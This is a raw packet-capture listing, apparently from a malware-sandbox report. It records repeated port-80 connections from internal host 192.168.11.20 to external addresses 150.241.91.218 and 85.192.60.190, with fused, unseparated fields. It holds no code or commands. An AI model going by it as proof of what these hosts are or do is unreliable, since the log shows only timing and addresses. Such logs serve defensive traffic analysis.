                                                                                                                                                              Nov 6, 2024 17:34:22.808593988 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.808615923 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.808639050 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.809237957 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.809268951 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.809314013 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.809631109 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.809691906 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.810229063 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.810261965 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.810285091 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.810306072 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.810822010 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.810851097 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.810874939 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.811268091 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.811536074 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.811567068 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.811588049 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.811609983 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.812339067 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.812371016 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.812391996 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.813318014 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.813349009 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.813371897 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.813540936 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.813571930 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.813592911 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.813615084 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.814050913 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.814167976 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.815562010 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.991549015 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.992571115 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.993676901 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.995022058 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.996247053 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.997538090 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:23.002460957 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:23.002470970 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:23.002899885 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:23.003000975 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:23.003143072 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:23.191279888 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:23.191574097 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:23.191643000 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:23.191672087 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:23.192001104 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:23.380295038 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:23.380352020 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:23.380388021 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:23.380417109 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:23.380633116 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:23.380633116 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:23.380819082 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:23.569396973 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:23.569434881 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:23.569458008 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:23.569478035 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:23.569665909 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:23.569665909 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:23.569696903 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:23.569860935 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:23.570035934 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:23.758371115 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:23.758430004 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:23.758471966 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:23.758508921 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:23.758544922 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:23.758843899 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:23.758898973 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:23.759186983 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:37.416862011 CET4975680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:16.526520014 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:16.526891947 CET4975880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:16.714468002 CET8049754150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:16.714617014 CET4975480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:16.714633942 CET8049758150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:16.714879990 CET4975880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:16.714895010 CET4975880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:16.714895010 CET4975880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:16.902765989 CET8049758150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:16.902776003 CET8049758150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:16.974730968 CET8049758150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:17.017656088 CET4975880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:17.018119097 CET4975980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:17.205955029 CET8049758150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:17.205965996 CET8049759150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:17.206154108 CET4975980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:17.206154108 CET4975880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:17.206268072 CET4975980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:17.206268072 CET4975980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:17.394392014 CET8049759150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:17.394402027 CET8049759150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:17.472141981 CET804975085.192.60.190192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:17.472477913 CET4975080192.168.11.2085.192.60.190
                                                                                                                                                              Nov 6, 2024 17:35:17.472477913 CET4975080192.168.11.2085.192.60.190
                                                                                                                                                              Nov 6, 2024 17:35:17.474467993 CET8049759150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:17.500363111 CET4975980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:17.500792027 CET4976080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:17.662350893 CET804975085.192.60.190192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:17.688255072 CET8049759150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:17.688455105 CET4975980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:17.688549995 CET8049760150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:17.688752890 CET4976080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:17.688817024 CET4976080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:17.688817024 CET4976080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:17.876642942 CET8049760150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:17.876745939 CET8049760150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:17.954338074 CET8049760150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:17.979839087 CET4976080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:17.980272055 CET4976180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:18.167541027 CET8049760150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:18.167721987 CET4976080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:18.167985916 CET8049761150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:18.168268919 CET4976180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:18.168410063 CET4976180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:18.168410063 CET4976180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:18.356077909 CET8049761150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:18.356089115 CET8049761150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:18.424431086 CET8049761150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:18.450786114 CET4976180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:18.451261997 CET4976280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:18.638520956 CET8049761150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:18.638781071 CET4976180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:18.639796019 CET8049762150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:18.639998913 CET4976280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:18.640270948 CET4976280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:18.640270948 CET4976280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:18.829154015 CET8049762150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:18.829164028 CET8049762150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:18.906228065 CET8049762150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:18.930605888 CET4976280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:18.931058884 CET4976380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:19.118433952 CET8049763150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:19.118779898 CET8049762150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:19.119028091 CET4976380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:19.119219065 CET4976380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:19.119219065 CET4976380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:19.119240046 CET4976280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:19.306567907 CET8049763150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:19.306577921 CET8049763150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:19.376014948 CET8049763150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:19.415357113 CET4976380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:19.420643091 CET4976480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:19.605515003 CET8049763150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:19.605793953 CET4976380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:19.608522892 CET8049764150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:19.608690977 CET4976480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:19.608824015 CET4976480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:19.608824015 CET4976480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:19.796870947 CET8049764150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:19.796889067 CET8049764150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:19.864202976 CET8049764150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:19.909985065 CET4976480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:19.910650969 CET4976580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:20.098082066 CET8049764150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:20.098200083 CET4976480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:20.098246098 CET8049765150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:20.098418951 CET4976580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:20.098512888 CET4976580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:20.098512888 CET4976580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:20.286664009 CET8049765150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:20.286674023 CET8049765150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:20.354223967 CET8049765150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:20.386090994 CET4976580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:20.386271954 CET4976680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:20.574265003 CET8049766150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:20.574363947 CET8049765150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:20.574424982 CET4976680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:20.574558973 CET4976680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:20.574558973 CET4976680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:20.574575901 CET4976580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:20.762315035 CET8049766150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:20.762332916 CET8049766150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:20.833436012 CET8049766150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:20.846165895 CET4976680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:20.846590042 CET4976780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:21.034363985 CET8049766150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:21.034408092 CET8049767150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:21.034665108 CET4976780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:21.034665108 CET4976680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:21.034841061 CET4976780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:21.034841061 CET4976780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:21.222660065 CET8049767150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:21.222688913 CET8049767150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:21.291078091 CET8049767150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:21.303852081 CET4976780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:21.304265022 CET4976880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:21.491641998 CET8049767150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:21.491939068 CET4976780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:21.492276907 CET8049768150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:21.492463112 CET4976880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:21.492588997 CET4976880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:21.492588997 CET4976880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:21.680665016 CET8049768150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:21.680706024 CET8049768150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:21.751667976 CET8049768150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:21.766340971 CET4976880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:21.766875982 CET4976980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:21.954720020 CET8049768150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:21.954963923 CET4976880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:21.955182076 CET8049769150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:21.955423117 CET4976980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:21.955686092 CET4976980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:21.955687046 CET4976980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:22.143754959 CET8049769150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:22.143847942 CET8049769150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:22.210306883 CET8049769150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:22.220889091 CET4976980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:22.221265078 CET4977080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:22.409213066 CET8049770150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:22.409255981 CET8049769150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:22.409420967 CET4977080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:22.409421921 CET4976980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:22.409552097 CET4977080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:22.409552097 CET4977080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:22.597661018 CET8049770150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:22.597687006 CET8049770150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:22.672405958 CET8049770150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:22.693037987 CET4977080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:22.693197012 CET4977180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:22.881114006 CET8049770150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:22.881304979 CET4977080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:22.881366968 CET8049771150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:22.881582975 CET4977180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:22.881757975 CET4977180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:22.881757975 CET4977180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:23.069860935 CET8049771150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:23.069885969 CET8049771150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:23.139317036 CET8049771150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:23.154432058 CET4977180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:23.154989958 CET4977280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:23.342267036 CET8049771150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:23.342454910 CET4977180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:23.343075037 CET8049772150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:23.343276024 CET4977280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:23.343369961 CET4977280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:23.343369961 CET4977280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:23.531524897 CET8049772150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:23.531578064 CET8049772150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:23.597650051 CET8049772150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:23.611861944 CET4977280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:23.612406015 CET4977380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:23.800242901 CET8049773150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:23.800261021 CET8049772150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:23.800601959 CET4977380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:23.800601959 CET4977280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:23.800704002 CET4977380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:23.800704002 CET4977380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:23.988746881 CET8049773150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:23.988847971 CET8049773150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:25.168999910 CET8049773150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:25.182219982 CET4977380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:25.182706118 CET4977480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:25.370618105 CET8049773150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:25.370629072 CET8049774150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:25.370826960 CET4977380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:25.370871067 CET4977480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:25.371047020 CET4977480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:25.371047020 CET4977480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:25.558970928 CET8049774150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:25.558983088 CET8049774150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:25.627413034 CET8049774150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:25.639231920 CET4977480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:25.639859915 CET4977580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:25.827510118 CET8049774150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:25.827617884 CET8049775150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:25.827742100 CET4977480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:25.827816010 CET4977580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:25.828094006 CET4977580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:25.828094006 CET4977580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:26.015768051 CET8049775150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:26.015829086 CET8049775150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:26.085067987 CET8049775150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:26.096889019 CET4977580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:26.097410917 CET4977680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:26.284825087 CET8049775150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:26.284982920 CET4977580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:26.285182953 CET8049776150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:26.285370111 CET4977680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:26.285476923 CET4977680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:26.285521984 CET4977680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:26.474591970 CET8049776150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:26.474602938 CET8049776150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:26.543991089 CET8049776150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:26.554505110 CET4977680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:26.554991961 CET4977780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:26.742539883 CET8049776150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:26.742660999 CET4977680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:26.742683887 CET8049777150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:26.742974997 CET4977780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:26.742991924 CET4977780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:26.742991924 CET4977780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:26.930783987 CET8049777150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:26.930794954 CET8049777150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:26.999397993 CET8049777150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:27.018099070 CET4977780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:27.018793106 CET4977880192.168.11.20150.241.91.218
